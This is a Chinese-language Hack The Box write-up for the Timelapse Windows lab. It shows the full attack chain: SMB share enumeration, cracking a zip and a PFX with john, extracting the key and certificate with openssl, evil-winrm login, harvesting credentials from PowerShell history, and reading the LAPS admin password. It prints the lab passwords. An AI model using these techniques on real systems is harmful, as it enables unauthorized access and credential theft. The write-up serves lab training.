【Hack The Box】windows练习-- Timelapse
创始人
2024-01-29 18:17:21
0

HTB 学习笔记

【Hack The Box】windows练习-- Timelapse


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • HTB 学习笔记
    • 信息收集
    • 我看smb
    • 爆破压缩包
    • pfx一系列
        • 得到enc
        • 得到key
        • 转储证书得到crt
    • 登陆

在这里插入图片描述

信息收集

53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-06-30 20:44:10Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-06-30T20:47:10+00:00; +8h01m03s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
62656/tcp open  msrpc             Microsoft Windows RPC

dc01.timelapse.htb
ker,dns,smp,winrm,rpc
timelapse.htb
但是smb没有像以前那样返回一堆数据,有些异常

我看smb

smbclient -L //dc01.timelapse.htb -N

oxdf@hacky$ smbclient -L //dc01.timelapse.htb -NSharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareIPC$            IPC       Remote IPCNETLOGON        Disk      Logon server share Shares          Disk      SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Shares 应该是我唯一可以获得一些东西地方

三股以 是所有Windows系统上的默认共享,并且ADMIN是所有 Windows 系统上的默认共享,并且 ADMIN是所有Windows系统上的默认共享,并且ADMIN和 C需要管理员权限,并且IPC需要管理员权限,并且 IPC需要管理员权限,并且IPC提供的不多。

smbclient -N //dc01.timelapse.htb/Shares

在这里插入图片描述

本地管理员密码解决方案 (LAPS) 是一种通过域管理本地管理员帐户密码的方法。 如果没有 laps,支持团队管理为每个系统保留唯一的本地管理员密码是非常具有挑战性的。 这导致共享凭据,这意味着当攻击者在系统上获得提升的特权时,他们可以转储共享凭据并使用它来访问其他系统。

LAPS 还会轮换管理员密码,定期更改它们,这样如果它们被攻击者捕获,它们会在一段时间后失效。

在这里插入图片描述
在这里插入图片描述

爆破压缩包

zip2john winrm_backup.zip > zip.txt
john --wordlist=/usr/share/wordlists/rockyou.txt zip.txt

在这里插入图片描述
legacyy_dev_auth.pfx
openssl从中提取私钥和证书(公钥)的命令 .pfx文件

在这里插入图片描述

pfx一系列

/usr/share/john/pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hashjohn --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash 

在这里插入图片描述得到密码
thuglegacy

得到enc

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
thuglegacy

在这里插入图片描述

得到key

openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
解密密钥

转储证书得到crt

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
在这里插入图片描述

登陆

evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crtnet user legacyy

在这里插入图片描述
只有一个远程登录组,这个没啥说的,我已经远程了,没有利用价值
还有一个development组,不知道是干嘛的,先等一会,没遇见过,先不管

在这里插入图片描述SeMachineAccountPrivilege
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
这三个组都没有利用价值

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

这里面,查看ps的历史文件,这里常见

在这里插入图片描述
得到一组凭证

svc_deploy
E3R$Q62^12p7PLlC%KWaxuaV
evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

在这里插入图片描述
使用 LAPS,DC 管理域中计算机的本地管理员密码。 通常创建一组用户并授予他们读取这些密码的权限,从而允许受信任的管理员访问所有本地管理员密码。

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

在这里插入图片描述
0OEJYZa3a69}%63e$2PZ,-Cq

这里最好快一点,因为ldaps会变更密码,谁知道密码会不会变呢
在这里插入图片描述
然后flag自己找吧

相关内容

热门资讯

喜欢穿一身黑的男生性格(喜欢穿... 今天百科达人给各位分享喜欢穿一身黑的男生性格的知识,其中也会对喜欢穿一身黑衣服的男人人好相处吗进行解...
发春是什么意思(思春和发春是什... 本篇文章极速百科给大家谈谈发春是什么意思,以及思春和发春是什么意思对应的知识点,希望对各位有所帮助,...
网络用语zl是什么意思(zl是... 今天给各位分享网络用语zl是什么意思的知识,其中也会对zl是啥意思是什么网络用语进行解释,如果能碰巧...
为什么酷狗音乐自己唱的歌不能下... 本篇文章极速百科小编给大家谈谈为什么酷狗音乐自己唱的歌不能下载到本地?,以及为什么酷狗下载的歌曲不是...
华为下载未安装的文件去哪找(华... 今天百科达人给各位分享华为下载未安装的文件去哪找的知识,其中也会对华为下载未安装的文件去哪找到进行解...
怎么往应用助手里添加应用(应用... 今天百科达人给各位分享怎么往应用助手里添加应用的知识,其中也会对应用助手怎么添加微信进行解释,如果能...
家里可以做假山养金鱼吗(假山能... 今天百科达人给各位分享家里可以做假山养金鱼吗的知识,其中也会对假山能放鱼缸里吗进行解释,如果能碰巧解...
四分五裂是什么生肖什么动物(四... 本篇文章极速百科小编给大家谈谈四分五裂是什么生肖什么动物,以及四分五裂打一生肖是什么对应的知识点,希...
一帆风顺二龙腾飞三阳开泰祝福语... 本篇文章极速百科给大家谈谈一帆风顺二龙腾飞三阳开泰祝福语,以及一帆风顺二龙腾飞三阳开泰祝福语结婚对应...
美团联名卡审核成功待激活(美团... 今天百科达人给各位分享美团联名卡审核成功待激活的知识,其中也会对美团联名卡审核未通过进行解释,如果能...